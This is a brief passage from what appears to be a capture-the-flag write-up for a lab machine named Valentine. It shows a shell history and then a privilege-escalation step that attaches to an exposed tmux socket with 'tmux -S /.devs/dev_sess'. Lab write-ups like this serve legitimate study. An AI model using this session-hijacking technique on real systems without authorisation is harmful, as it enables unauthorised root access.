Priv Esc
hype@Valentine:~$ history
1 exit
2 exot
3 exit
4 ls -la
5 cd /
6 ls -la
7 cd .devs
8 ls -la
9 tmux -L dev_sess
10 tmux a -t dev_sess
11 tmux --help
12 tmux -S /.devs/dev_sess
13 exit
14 sudo -l
15 history

hype@Valentine:~$ tmux -S /.devs/dev_sess

Last updated
Was this helpful?